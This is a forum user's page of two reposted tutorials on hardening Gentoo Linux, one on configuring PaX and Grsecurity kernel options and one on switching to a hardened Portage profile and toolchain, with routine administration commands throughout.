Everything posted by Aerosol

  1. Configuring PaX with Grsecurity We’ve already briefly discussed PaX, but now it’s time to describe it in detail. PaX provides the following security enhancements: Non-executable memory: Sections that do not contain actual program code are marked as non-executable to prevent jumping to an arbitrary location in memory and executing code from there. Therefore, PaX ensures that program data is kept in a non-executable memory region from which we cannot execute code. ASLR: PaX provides support for randomizing the address space of the program to prevent sections from being loaded at the same base address upon program/system restart. Miscellaneous memory protection: PaX also provides other protections that are described in [5]. We’ve also mentioned that we need to use a PaX-enabled kernel such as hardened-sources in order to use PaX. The hardened-sources kernel also supports Grsecurity, which is why we’ll be using it here. First we need to install it onto the current system. # emerge sys-kernel/hardened-sources This will download and extract the kernel into the /usr/src/ directory; the kernel will have the word “hardened” in its name, which is how we can differentiate between kernels. To configure a hardened kernel, we should enter the kernel directory /usr/src/linux-3.10.1-hardened-r1/ and issue the “make menuconfig” command. Then we should go under Security Options – Grsecurity, where the following will be available. Note that some options are only available on the amd64 architecture, while others are available on x86; we’ll be looking only at the amd64 configuration options, but they should be pretty much the same on both architectures. We must choose “Customize Configuration,” which will present PaX-related settings to us, as shown below. The PaX menu has the following options available (note that the description provided with each of the options presented below is taken from the kernel’s Help menu, which you can also see in the picture above). Enable various PaX features PaX control Support soft mode: Allows running PaX in soft mode, which doesn’t enforce PaX features by default; PaX is enabled only on explicitly marked executables. Use ELF program header marking: Enables adding a PaX-specific header to ELF executables, which lets us enable/disable PaX features on a per-executable basis by using paxctl. Use filesystem extended attributes marking: Similar to the “Use ELF program header marking” option, except that per-executable PaX features are controlled with setfattr, where the control flags are read from the user.pax.flags extended file attribute. Note that the filesystem used must support these extended attributes, so we should only use this option with supported filesystems. MAC system integration [none, direct, hook]: Option for controlling per-executable PaX features through a mandatory access control (MAC) system. Non-executable pages Enforce non-executable pages: Memory pages are marked as non-executable, which prevents an attacker from loading shellcode into memory and executing it; typical memory sections that need to be marked as non-executable are the stack and heap, which must be non-executable if we want to prevent various kinds of attacks like stack or heap buffer overflows. If this option is disabled, then the memory block returned by the malloc function will be readable as well as executable, which shouldn’t be the case; the memory region returned by malloc should not be executable.
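If a particular program genuinely needs executable heap memory or other relaxed behavior, the per-executable marking mechanisms mentioned above (paxctl or setfattr) let us weaken individual PaX features for just that binary instead of the whole system. A minimal sketch, assuming sys-apps/paxctl and the attr tools are installed and /usr/bin/someprog is a hypothetical binary (flag letters may differ slightly between tool versions, so check paxctl’s own help):
# paxctl -v /usr/bin/someprog
# paxctl -c /usr/bin/someprog
# paxctl -m /usr/bin/someprog
# setfattr -n user.pax.flags -v "m" /usr/bin/someprog
# getfattr -n user.pax.flags /usr/bin/someprog
The -v option views the flags stored in the ELF program header, -c converts the header so it can hold PaX flags, and the lowercase -m disables MPROTECT for this one binary only (uppercase letters re-enable a feature). The setfattr/getfattr pair is the extended-attribute alternative described above and requires a filesystem that supports xattrs.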
There are some programs that rely on memory returned by malloc being executable, like WINE, but we should learn to live without those programs (at least on a hardened machine). Paging based non-executable pages: Paging feature of the CPU that uses hardware non-executable bit support. Emulate trampolines: Some programs use trampolines to execute instructions from non-executable memory pages. If we enable non-executable pages, such programs won’t be able to use trampolines anymore. Therefore, to still allow specific programs to use trampolines, we should enable this feature to emulate the trampolines while keeping the protection provided by non-executable pages. Restrict mprotect(): This option prevents programs from changing non-executable memory pages into executable ones, changing read-only memory pages into writable ones, creating executable pages from anonymous memory, and making relro data pages writable again. We can also use chpax or paxctl to control this feature on a per-executable basis. Use legacy/compat protection demoting: When an application tries to allocate RWX memory, the kernel denies access by returning the proper error code to the application. Allow ELF text relocations: Libraries that use position-independent code do not need to relocate their code; text relocations can be abused by an attacker to attack the system, which is why we shouldn’t enable this option. Enforce non-executable kernel pages: When we use this option, injecting code into kernel memory is harder, because the kernel enforces the non-executable bit on kernel pages; this is a kernel-mode equivalent of PAGEEXEC and MPROTECT. Return Address Instrumentation Method [bts, or]: Specifies the method used to dereference pointers. The “bts” option is compatible with binary-only modules but has a higher runtime overhead, while “or” is incompatible with binary-only modules but has lower runtime overhead. Address Space Layout Randomization Address Space Layout Randomization: By enabling this option, we can randomize the following memory areas when the program is loaded: the task’s kernel and user stack, the base address of the executable, and the base address for mmap() function calls that create new mappings in the process’s virtual address space. Randomize kernel stack base: Randomizes the kernel stack of every task running in the kernel. Randomize user stack base: Randomizes the user stack of every task running in user space. Randomize mmap() base: Randomizes the base address for mmap() function calls, which causes all dynamically loaded libraries to be loaded at random addresses, making it harder to guess the right address. Miscellaneous Hardening Features Sanitize kernel stack: When enabled, this option erases the kernel stack before returning from a system call, which reduces the information a kernel stack leak can reveal. If you decide to enable this option, keep in mind that the slowdown of the system will be about 1%. Forcibly initialize local variables copied to userland: When enabled, this option zero-initializes some local variables that are copied to user space to prevent information leakage from the kernel. This option is similar to the previous one, but doesn’t slow down the system as much. Prevent invalid userland pointer dereference: When enabled, this option prevents dereferencing userland pointers where kernel pointers are expected, which can be useful in preventing exploitation due to kernel bugs.
Whenever a program calls into the kernel to perform some action, the kernel needs to take the userland pointer and read data from it. Malicious software can exploit that to perform actions in the kernel that should not be allowed; when this option is enabled, the kernel doesn’t directly use the userland pointer. Prevent various kernel object reference counter overflows: When enabled, this option prevents overflowing various kinds of object reference counters through their abuse. Reference counters are used for counting objects, but an attacker can misuse them by incrementing them so much that they reach the maximum value and wrap around, which might set the counter to zero or to a negative number. This can result in unexpected actions such as freeing memory that’s still being used. Automatically constify eligible structures: When enabled, this option will automatically mark a structure that contains only function pointers as constant, which prevents overwriting that piece of memory (because it’s marked as const). This prevents attacks that try to overwrite function pointers to point to shellcode, which would be executed when the function gets called. Harden heap object copies between kernel and userland: When enabled, the kernel will enforce the size of heap objects when they are copied between user and kernel land. Prevent various integer overflows in function size parameters: When enabled, the kernel will recompute expressions passed as function arguments with double precision and, if an overflow occurs, the event is logged and the process killed. Generate some entropy during boot: When enabled, the kernel will extract some entropy from program state, which causes a minor slowdown of the system boot process. Memory protections Deny reading/writing to /dev/kmem, /dev/mem, and /dev/port: When enabled, we won’t be able to use /dev/kmem, /dev/mem, /dev/port, and /dev/cpu/*/msr, which means that an attacker won’t be able to insert malicious code into the running kernel; the attacker won’t even be able to open those devices if this option is enabled. But he might still be able to modify the running kernel by using privileged I/O through ioperm/iopl. Disable privileged I/O: When enabled, the ioperm/iopl calls will be disabled and will return an error, which prevents an attacker from changing the running kernel by using those operations. If you use an X server with your hardened kernel, this option should be disabled; otherwise the X server will fail to start with the “xf86EnableIOPorts: failed to set IOPL for I/O (Operation not permitted)” error message. Disable unprivileged PERF_EVENTS usage by default: When enabled, /proc/sys/kernel/perf_event_paranoid can be set to 3 through sysctl, which will prevent unprivileged use of PERF_EVENTS syscalls. Insert random gaps between thread stacks: When enabled, a random gap will be put between thread stacks, which reduces the reliability of overwriting another thread’s stack. Harden ASLR against information leaks and entropy reduction: When enabled, /proc/<pid>/maps and /proc/<pid>/stat will contain no information about the memory addresses used by the process <pid>. Additionally, suid/sgid binary programs will have their argv/env strings limited to 512KB and stack limited to 8MB to prevent abuse. We need to enable this to harden the ASLR security a little bit more, so it can’t be easily bypassed. Deter exploit bruteforcing: Often programs start a new thread or fork a new child in order to accept a new connection.
This allows an attacker to bruteforce the unknown part of the shellcode in order to gain code execution; this is possible because the target process is not killed, only the thread/child is. This option slows down bruteforcing attempts by delaying the parent process by 30 seconds on every fork when a child is killed by PaX or crashes due to an illegal instruction. When that happens, the administrator will have to manually restart the daemon to make it behave normally again. Harden module auto-loading: When enabled, module auto-loading will be limited to privileged users. This prevents unprivileged users from loading vulnerable modules into the kernel. We can also disable the auto-loading of modules altogether but, depending on the use, we might not want to do that; therefore this option is perfect for limiting access to auto-loading features. Hide kernel symbols: When enabled, information on loaded modules and kernel symbols will be restricted to privileged users. This prevents unprivileged users from getting their hands on kernel information, such as variables, functions, and symbols. Active kernel exploit response: When enabled, if a PaX alert is triggered because of suspicious activity in the kernel, the kernel will actively respond to the threat not only by terminating the process that caused the alert, but also by blocking the user that started the process to prevent further exploitation. If the user is root, the kernel will panic the system; if it’s a normal user, the alert will be logged, all of that user’s processes will be terminated, and new processes (by the same user) will be permitted to start only after a system restart. Role-Based Access Control Options Disable RBAC system: When enabled, the /dev/grsec device is removed from the kernel, which disables the RBAC system. If you want to use the RBAC system, you should leave this option disabled. Hide kernel processes: When enabled, all kernel threads are hidden from all processes. We should enable this feature if we will use RBAC. Maximum tries before password lockout: Specifies the maximum number of times a user can re-enter the password before being blocked for a certain period of time. This effectively prevents bruteforcing the password. Time to wait after max password tries, in seconds: Specifies the time the user must wait after entering the password incorrectly a predefined number of times. Filesystem Protections Proc restrictions: When enabled, the security of the /proc filesystem will be hardened. Restrict /proc to user only: When enabled, non-root users will only be able to see their own processes. Allow special group: When enabled, a chosen group will be able to see all processes and network information, while kernel and symbol information may still remain invisible (depending on other options). Additional restrictions: When enabled, the /proc filesystem will be further protected by restricting normal users from seeing device and slabinfo information. Linking restrictions: When enabled, users will no longer be able to follow symlinks owned by other users in world-writable +t directories, such as /tmp; they will only be able to follow symlinks they own. A sysctl option linking_restrictions is created. Kernel-enforced SymlinksIfOwnerMatch: When enabled, a secure replacement for Apache’s SymlinksIfOwnerMatch option will be used for the specified group. A sysctl option enforce_symlinksifowner is created.
FIFO restrictions: When enabled, each user will only be able to write to FIFOs he owns (in world-writable +t directories such as /tmp). A sysctl option fifo_restrictions is created. Sysfs/debugfs restriction: When enabled, sysfs as well as debugfs will only be accessible by root. This lowers the possibility of an attacker exploiting those filesystems, whose purpose is to provide access to hardware and debug information. This option doesn’t go well with a desktop system, because it breaks certain things. For example, if we want to start the wicd-client program, we’ll get the error message “OSError: [Errno 13] Permission denied: ‘/sys/class/net/’” and wicd-client won’t start under a normal user; we can nevertheless run it as root. This option also breaks pulseaudio and battery widgets, which won’t be able to access the /sys filesystem, which is why pulseaudio on a hardened system might not work. Don’t enable this option if you’re on a desktop system. Runtime read-only mount protection: When enabled, the filesystem will be protected so that no writable mounts are allowed, read-only mounts cannot be remounted as read-write, and write operations are disabled for block devices. This option is mainly useful for embedded devices. A sysctl option romount_protect is created. Eliminate stat/notify-based device sidechannels: When enabled, timing analysis on devices by using stat or inotify/dnotify/fanotify will be disabled for unprivileged users. Chroot jail restrictions: When enabled, we can make breaking out of a chroot jail much more difficult. Various options can be enabled that will make processes inside the jail more restricted. Deny mounts: Processes inside the jail won’t be able to mount filesystems. Deny double-chroots: Processes inside the jail won’t be able to chroot again, which is one of the methods used for breaking out of a chroot jail. A sysctl option chroot_deny_chroot is created. Deny pivot_root in chroot: Processes inside the jail won’t be able to use the pivot_root() function, which can be used to break out of a chroot by changing the root filesystem. A sysctl option chroot_deny_pivot is created. Enforce chdir(“/”) on all chroots: When enabled, the current working directory will be changed to the root directory of the chroot when chrooted applications are used. A sysctl option chroot_enforce_chdir is created. Deny (f)chmod +s: Processes inside the jail won’t be able to chmod/fchmod files to set suid/sgid bits, which is just another method of breaking out of a chroot. A sysctl option chroot_deny_chmod is created. Deny fchdir out of chroot: When enabled, another method of breaking out of a chroot environment will be prevented: fchdir-ing to a file descriptor that the chrooting process holds and that points to a directory outside the chroot. A sysctl option chroot_deny_fchdir is created. Deny mknod: Processes inside the jail won’t be allowed to use mknod, which an attacker could use to recreate a device that already exists and steal or delete data from the hard drive. A sysctl option chroot_deny_mknod is created. Deny shmat() out of chroot: Processes inside the jail won’t be able to attach to shared memory segments that were created outside the chroot. A sysctl option chroot_deny_shmat is created. Deny access to abstract AF_UNIX sockets out of chroot: Processes inside the jail won’t be able to connect to sockets that were bound outside the chroot. A sysctl option chroot_deny_unix is created.
Protect outside processes: Processes inside the jail won’t be able to view or kill processes outside the chroot, or send them signals with fcntl, ptrace, capget, getpgid, setpgid, getsid. A sysctl option chroot_findtask is created. Restrict priority changes: Processes inside the jail won’t be able to raise the priority of processes in the chroot. A sysctl option chroot_restrict_nice is created. Deny sysctl writes: When enabled, a user in a chroot won’t be able to write to sysctl entries via sysctl or /proc. A sysctl option chroot_deny_sysctl is created. Capability restrictions: When enabled, certain capabilities of processes in a chroot will be disabled. A sysctl option chroot_caps is created. Exempt initrd tasks from restrictions: When enabled, tasks created prior to init will be excluded from chroot restrictions, which keeps the privileged operations of tools such as Plymouth working in a chroot. Kernel Auditing Single group for auditing: This option can be used when we want to log only certain users on the system and not the whole system; we can specify the group we want to monitor. A sysctl option audit_group is created. Exec logging: When enabled, all execve and thus exec calls will be logged. This option is useful when the system is used as a server and we would like to keep track of users. A sysctl option exec_logging is created. Note that this option will produce a lot of logs on an active system. Resource logging: When enabled, all requests for resources that exceed the maximum limit will be logged. A sysctl option resource_logging is created. Log execs within chroot: When enabled, all executions inside a chroot jail will be logged to syslog. A sysctl option chroot_execlog is created. Ptrace logging: When enabled, all attempts to attach to a process via ptrace will be logged. A sysctl option audit_ptrace is created. Chdir logging: When enabled, all chdir calls are logged. A sysctl option audit_chdir is created. (Un)Mount logging: When enabled, all mounts/unmounts will be logged. A sysctl option audit_mount is created. Signal logging: When enabled, various signals will be logged, which might be triggered by a possible exploit attempt. A sysctl option signal_logging is created. Fork failure logging: When enabled, all failed fork attempts will be logged, which can detect a fork bomb. A sysctl option forkfail_logging is created. Time change logging: When enabled, any changes to the system time are logged. A sysctl option timechange_logging is created. /proc/<pid>/ipaddr support: When enabled, a new entry /proc/<pid>/ipaddr will be created, containing the IP address of the user running the task. Denied RWX mmap/mprotect logging: When enabled, mmap and mprotect calls will be logged when they are blocked by PaX. A sysctl option rwxmap_logging is created. ELF text relocations logging: When enabled, text relocations in a given binary/library will be logged. We can use this to detect the programs or libraries that need text relocations in order to get rid of them. A sysctl option audit_textrel is created. Executable Protections Dmesg(8) restriction: When enabled, non-root users won’t be able to use the dmesg command to view the kernel logs, which might contain kernel addresses that an attacker could use for exploitation. A sysctl option dmesg is created. Deter ptrace-based process snooping: When enabled, a non-root user won’t be able to attach to an arbitrary process and monitor it by using ptrace. A sysctl option harden_ptrace is created.
Require read access to ptrace sensitive binaries: When enabled, non-root users won’t be able to monitor unreadable binaries by using ptrace. A sysctl option ptrace_readexec is created. Enforce consistent multithreaded privileges: When using a multi-threaded application, a change from root uid to non-root uid will be propagated to all the threads, not just the current one. A sysctl option consistent_setxid is created. Trusted path execution (TPE): This option restricts the execution of files based on their path, which makes privilege escalation exploits harder; if an attacker can upload a binary into an untrusted path on the server, he won’t be able to execute it. When using this option on a desktop system, it’s best to set the “Invert GID” option. By using TPE, file execution is more restricted, which might sometimes prevent emerge from installing certain packages, but it’s nevertheless a useful security option. If we merely enable TPE without enabling the options below, only the selected group will be restricted to executing files in root-owned directories writable only by root. A sysctl option tpe is created. Partially restrict all non-root users: If enabled, all non-root users will only be able to execute files in root-owned directories writable only by root and in directories owned by the user that are not group- or world-writable. A sysctl option tpe_restrict_all is created. Invert GID option: This option specifies that users not in the chosen group will only be able to execute files in root-owned directories writable only by root (this option restricts users from executing files in user-owned directories that are not group- or world-writable). The selected group itself will not have this restriction, which is useful if we want to apply TPE to most users on the system except the ones in the chosen group. A sysctl option tpe_invert is created. GID for TPE-untrusted users/GID for TPE-trusted users: Note that this option changes based on previously selected options. When the option reads “GID for TPE-untrusted users,” it specifies the group that will have TPE enabled; the group will be marked as untrusted and the execution permissions of users belonging to it will be limited. When the option reads “GID for TPE-trusted users,” it specifies a group whose users will be able to execute files in a user-owned directory which is not group- or world-writable. A sysctl option tpe_gid is created. Network Protections Larger entropy pools: When enabled, the size of the entropy pools used by Linux will be doubled. TCP/UDP blackhole and LAST_ACK DoS prevention: When enabled, neither TCP RST nor ICMP destination-unreachable packets will be sent in response to packets received for which there is no listening process. This feature can be very useful if we want to reduce our visibility to scanners such as nmap. Two sysctl options, ip_blackhole and lastack_retries, will be created. Disable TCP simultaneous connect. Socket restrictions Deny any sockets to group: Specifies a group that won’t be able to connect to other hosts or run server applications. A sysctl option socket_all is created. Deny client sockets to group: Specifies a group that won’t be able to connect to other hosts, but will be able to run server applications. A sysctl option socket_client is created. Deny server sockets to group: Specifies a group that won’t be able to run server applications. A sysctl option socket_server is created.
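Nearly every option above creates a sysctl entry, and once the sysctl support described in the next section is compiled in, these features can be inspected and toggled at runtime without rebuilding the kernel. A minimal sketch, using option names already mentioned above and assuming the corresponding features were compiled in:
# sysctl kernel.grsecurity.chroot_deny_chroot
# sysctl -w kernel.grsecurity.harden_ptrace=1
# echo 1 > /proc/sys/kernel/grsecurity/tpe
# sysctl -w kernel.grsecurity.grsec_lock=1
The last command locks the grsecurity sysctl settings until the next reboot, so it should only be run after everything else has been configured the way we want it.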
Sysctl Support Sysctl support: When enabled, we will be able to change the grsecurity options without recompiling the kernel. We can change the options by changing the values under /proc/sys/kernel/grsecurity. Extra sysctl support for distro makers: When enabled, additional sysctl options are created that can be used to manipulate processes running as root. In order to use this option, grsec_lock needs to be enabled after boot. Turn on features by default: If enabled, all sysctl features are enabled by default. Logging Options Add source IP address to SELinux AVC log messages: When enabled, the source IP address of the remote machine will be added to log messages. Seconds in between log messages: Specifies the number of seconds between grsecurity log messages. Number of messages in a burst: Specifies the maximum number of messages allowed within the flood time interval. After we’ve enabled all the options that we want to use, we must save the kernel configuration and build the kernel by executing the command below: # make && make modules && make modules_install After that, we should copy our newly built kernel to the /boot directory and change grub.conf to boot from the newly built kernel. We can copy the kernel to the /boot partition with the command below: # cp arch/x86_64/boot/bzImage /boot/kernel-hardened The grub.conf should then look like this: title=Gentoo root (hd0,0) kernel /boot/kernel-hardened root=/dev/sda3 If something goes wrong or doesn’t work after the reboot, we should start the rsyslog daemon and look into the /var/log/syslog file for grsec entries, which should clearly state the reason for the problems. We should start with the kernel that gives us the least privilege and then slowly add permissions as needed. # /etc/init.d/rsyslog start # tail -f /var/log/syslog References: [1] Hardened Gentoo Project:Hardened - Gentoo Wiki. [2] Security-Enhanced Linux - Wikipedia, the free encyclopedia. [3] RSBAC - Wikipedia, the free encyclopedia. [4] Hardened/Toolchain https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO. [5] Hardened/PaX Quickstart https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart. [6] checksec.sh trapkit.de - checksec.sh. [7] KERNHEAP http://subreption.com/products/kernheap/. [8] Advanced Portage Features Gentoo Linux Documentation -- Advanced Portage Features. [9] Elfix Homepage elfix. [10] Avfs: An On-Access Anti-Virus File System. [11] EICAR Download, EICAR - European Expert Group for IT-Security. [12] Gentoo Security Handbook, Gentoo Linux Documentation -- Gentoo Security Handbook. Source
  2. Introduction In this tutorial, we’ll talk about how to harden a Linux system to make it more secure. We’ll specifically use Gentoo Linux, but the concepts should be fairly similar in other distributions as well. Since Gentoo Linux is a source distribution (not a binary one, as most other Linux distributions are), there will be enough details provided to do this in your own Linux distribution, although some steps will not be the same. If we look at the hardened Gentoo project web page located at [1], we can see a couple of projects that can be used to enhance the security of the Linux operating system; they are listed below. PaX is a kernel patch that protects us from stack and heap overflows. PaX does this by using ASLR (address space layout randomization), which loads program sections at random memory locations. Shellcode must have an address embedded in it to jump to in order to gain code execution and, because the address of the buffer in memory is randomized, this is much harder to achieve. PaX adds an additional layer of protection by keeping the data used by the program in a non-executable memory region, which means an attacker won’t be able to execute the code they managed to write into memory. In order to use PaX, we have to use a PaX-enabled kernel, such as hardened-sources. PIE/PIC (position-independent code): Normally, an executable has a fixed base address where it is loaded. This is also the address that is added to the RVAs in order to calculate the addresses of the functions inside the executable. If the executable is compiled with PIE support, it can be loaded anywhere in memory, while it must be loaded at a fixed address if compiled without PIE support. PIE needs to be enabled if we want to use PaX to take advantage of ASLR. RELRO (relocation read-only): When we run an executable, the loader needs to write into some sections that don’t need to remain writable after the application has started. Such sections are .ctors, .dtors, .jcr, .dynamic, and .got [4]. If we mark those sections as read-only, an attacker won’t be able to use certain attacks that might be used when trying to gain code execution, such as overwriting entries in the GOT table. SSP (stack-smashing protector) is used in user mode; it protects against stack overflows by placing a canary on the stack. When an attacker wants to overwrite the return EIP address on the stack, he must also overwrite the randomly chosen canary. When that happens, the system detects that the canary has been overwritten, in which case the application is terminated, thus not allowing an attacker to jump to an arbitrary location in memory and execute code from there. RBAC (role-based access control): Note that RBAC is not the same as RSBAC, which we’ll present later on. RBAC is an access control mechanism that can be used by SELinux, Grsecurity, etc. By default, the creator of a file has total control over it, while RBAC forces the root user to have control of the file, regardless of who created it. Therefore all users on the system must follow the RBAC rules set by the administrator of the system. Additionally, we can also use the following access control systems, which are used to control access between processes and objects. Normally, we have to choose one of the systems outlined below, because only one of the access control systems can be used at a time.
Access control systems include the following: SELinux (security-enhanced Linux) AppArmor (application armor) Grsecurity, which contains various patches that can be applied to the kernel to increase the security of the whole system. If we would like to enable Grsecurity in the kernel, we must use a Grsecurity-enabled kernel, which is hardened-sources. RSBAC (rule set-based access control): We must use the rsbac-sources kernel to build a kernel with RSBAC support. SMACK Each of the systems mentioned above can be used to make the exploitation of your system harder for an attacker. Let’s say you’re running a vulnerable application that’s listening on some predefined port that an attacker can connect to from anywhere; we can imagine an FTP server. The installed version of the FTP server contains a vulnerability that can be triggered and exploited by using an overly long APPE FTP command. If the FTP server is not updated, an attacker can exploit the vulnerability to gain total control of the Linux system, but if we harden the system, we might prevent the attacker from doing so. In that case, the vulnerability is still present in the vulnerable FTP server, but the attacker won’t be able to exploit it due to the security enhancements in place. The Portage Profile Every Gentoo installation has a Portage profile, which specifies the default USE flags for the whole system. Portage is Gentoo’s package management system, which consults a number of system files when installing the system and specific programs. All files that affect the installation of a specific package are listed in the portage man page, which can be invoked by executing “man portage.” The USE flags are used to specify which functionality each package should be compiled with. We can list the USE flags with the “equery uses <package>” command, as shown below: # equery uses xterm [ Legend : U - final flag setting for installation] [ : I - package is installed with flag ] [ Colors : set, unset ] * Found these USE flags for x11-terms/xterm-285: U I - - Xaw3d : Add support for the 3d athena widget set - - toolbar : Enable the xterm toolbar to be built + + truetype : Add support for FreeType and/or FreeType2 fonts + + unicode : Add support for Unicode Notice that the package xterm has unicode and truetype enabled, but Xaw3d and toolbar disabled; those are the features that we can freely enable or disable, after which we need to recompile the package. With the configuration above, the package will be able to use Unicode characters, but if we disable the unicode USE flag, Unicode characters won’t be supported anymore. So, when we select a system profile, we’re actually selecting the default USE flags that the system will be built with. All the available profiles can be listed by issuing the “eselect profile list” command, as seen below. Notice that the default profile is the one marked with the character ‘*’. # eselect profile list Available profile symlink targets: [1] default/linux/amd64/13.0 [2] default/linux/amd64/13.0/selinux [3] default/linux/amd64/13.0/desktop * [4] default/linux/amd64/13.0/desktop/gnome [5] default/linux/amd64/13.0/desktop/kde [6] default/linux/amd64/13.0/developer [7] default/linux/amd64/13.0/no-multilib [8] default/linux/amd64/13.0/x32 [9] hardened/linux/amd64 [10] hardened/linux/amd64/selinux [11] hardened/linux/amd64/no-multilib [12] hardened/linux/amd64/no-multilib/selinux [13] hardened/linux/amd64/x32 [14] hardened/linux/uclibc/amd64 The profiles listed above have the syntax shown in the list below.
Profile number: the number of each profile, embedded in the brackets [ and ]. Profile type: the type of profile, where normal profiles are specified with the default keyword, while hardened profiles are listed with the hardened keyword. Profile subtype: the profile subtype used for the kernel, which can be either linux or bsd. Architecture: the architecture of the profile, which can be one of the listed values: x86, amd64, etc. Release number: release number of the profile. Target: target of the profile, which can be one of the values selinux, desktop, developer, etc. The desktop target also has two subtargets, kde and gnome. All the files for profiles are available under the /usr/portage/profiles/ directory. The current profile “default/linux/amd64/13.0/desktop” is located in the /usr/portage/profiles/default/linux/amd64/13.0/desktop/ directory and contains the following files. # ls /usr/portage/profiles/default/linux/amd64/13.0/desktop/ -l total 8 -rw-r--r-- 1 portage portage 2 Jan 16 2013 eapi drwxr-xr-x 2 portage portage 30 Jan 16 2013 gnome drwxr-xr-x 2 portage portage 30 Jan 16 2013 kde -rw-r--r-- 1 portage portage 34 Jan 16 2013 parent The gnome and kde directories represent the subprofiles, while the parent file is used to pull in additional profiles that constitute the current profile. The parent file contains the following: # cat /usr/portage/profiles/default/linux/amd64/13.0/desktop/parent .. ../../../../../targets/desktop In order to fully understand the profile we must pull in the parent directory as well as the “../../../../../targets/desktop” directory, which contains the following files: # ls /usr/portage/profiles/default/linux/amd64/13.0/ desktop developer eapi no-multilib package.use.stable.mask parent selinux use.mask use.stable.mask x32 # ls /usr/portage/profiles/targets/desktop/ gnome kde make.defaults package.use There are multiple files that can be used with each profile, but in our case the following files are used: make.defaults, package.use, package.use.stable.mask, use.mask, use.stable.mask, eapi, … In addition, the referenced profiles can themselves reference other profiles, which are also pulled in. The most interesting files are make.defaults and package.use. The make.defaults file contains all the default USE flags that will be used when building the system. The USE flags can be seen below. # cat /usr/portage/profiles/targets/desktop/make.defaults USE="a52 aac acpi alsa bluetooth branding cairo cdda cdr consolekit cups dbus dri dts dvd dvdr emboss encode exif fam firefox flac gif gpm gtk jpeg lcms ldap libnotify mad mng mp3 mp4 mpeg ogg opengl pango pdf png policykit ppds qt3support qt4 sdl spell startup-notification svg tiff truetype vorbis udev udisks unicode upower usb wxwidgets X xcb x264 xml xv xvid" The package.use file is used to apply certain USE flags to specific packages, which can be seen below. The net-nds/openldap package will be compiled with the minimal USE flag. # cat /usr/portage/profiles/targets/desktop/package.use | grep -v ^# | grep -v ^$ <gnome-base/gvfs-1.14 gdu -udisks dev-libs/libxml2 python media-libs/libpng apng sys-apps/systemd gudev introspection keymap sys-fs/eudev gudev hwdb introspection keymap >=sys-fs/udev-171 gudev hwdb introspection keymap >=virtual/udev-171 gudev hwdb introspection keymap xfce-base/xfdesktop thunar net-nds/openldap minimal If we run the “equery uses openldap” command, we’ll see that the minimal USE flag is enabled.
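As an aside, on a real system we would normally not edit the profile files themselves; per-package USE flag overrides usually go into /etc/portage/package.use instead. A minimal sketch, where the openldap line mirrors the profile entry shown above and the vim line is just a hypothetical illustration:
# echo "net-nds/openldap minimal" >> /etc/portage/package.use
# echo "app-editors/vim -X python" >> /etc/portage/package.use
# emerge --ask --newuse net-nds/openldap app-editors/vim
The --newuse option tells emerge to rebuild packages whose USE flags have changed since they were installed, so the new settings actually take effect.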
The USE flags that will be used are presented in the picture below, where the red USE flags are enabled and the blue USE flags are disabled. Notice that the minimal USE flag is red and therefore enabled. If we edit /usr/portage/profiles/targets/desktop/package.use, comment out the “net-nds/openldap minimal” line, and then rerun the “equery uses openldap” command, the minimal USE flag will be disabled, as can be seen below. Therefore we can see how the USE flags affect the system we’re using. In order to select a hardened profile, we must run the command below to set the “hardened/linux/amd64” profile. # eselect profile set 9 After setting the profile that we want, we can check whether the change was successful (notice that the ‘*’ character now marks the “hardened/linux/amd64” profile). # eselect profile list Available profile symlink targets: [1] default/linux/amd64/13.0 [2] default/linux/amd64/13.0/selinux [3] default/linux/amd64/13.0/desktop [4] default/linux/amd64/13.0/desktop/gnome [5] default/linux/amd64/13.0/desktop/kde [6] default/linux/amd64/13.0/developer [7] default/linux/amd64/13.0/no-multilib [8] default/linux/amd64/13.0/x32 [9] hardened/linux/amd64 * [10] hardened/linux/amd64/selinux [11] hardened/linux/amd64/no-multilib [12] hardened/linux/amd64/no-multilib/selinux [13] hardened/linux/amd64/x32 [14] hardened/linux/uclibc/amd64 Note that by running the “eselect profile set 9” command we didn’t actually change anything in the system. We merely changed the profile that will be used when building and installing packages, which means the new USE flags will be used when packages are being installed. Therefore we must rebuild the system in order for the changes to take effect. Some of the most important packages in the system are the ones that are actually used in the build process, such as gcc, binutils, and glibc. Those packages are the heart of the Gentoo Linux system, since they are used to compile and link all other packages. If we want to apply the hardened profile to those packages, we must rebuild them by issuing the emerge command. # emerge virtual/libc sys-devel/gcc sys-devel/binutils Once the rebuilding is done, we’ll have a hardened toolchain ready to start building other packages using the hardened profile. We also need to set the hardened gcc compiler as the default. Note that we can choose gcc with both SSP and PIE enabled or disabled. We can display all available gcc versions with the “gcc-config -l” command, as seen below. The first option, which supports SSP as well as PIE, is already selected, so we don’t have to do anything. # gcc-config -l [1] x86_64-pc-linux-gnu-4.5.4 * [2] x86_64-pc-linux-gnu-4.5.4-hardenednopie [3] x86_64-pc-linux-gnu-4.5.4-hardenednopiessp [4] x86_64-pc-linux-gnu-4.5.4-hardenednossp [5] x86_64-pc-linux-gnu-4.5.4-vanilla References: [1] Hardened Gentoo http://www.gentoo.org/proj/en/hardened/. [2] Security-Enhanced Linux - Wikipedia, the free encyclopedia. [3] RSBAC - Wikipedia, the free encyclopedia. [4] Hardened/Toolchain https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO. [5] Hardened/PaX Quickstart https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart. [6] checksec.sh trapkit.de - checksec.sh. [7] KERNHEAP http://subreption.com/products/kernheap/. [8] Advanced Portage Features http://www.gentoo.org/doc/en/handbook/handbook-amd64.xml?part=3&chap=6. [9] Elfix Homepage elfix. [10] Avfs: An On-Access Anti-Virus File System.
[11] EICAR Download, EICAR - European Expert Group for IT-Security. [12] Gentoo Security Handbook, http://www.gentoo.org/doc/en/security/security-handbook.xml. Source
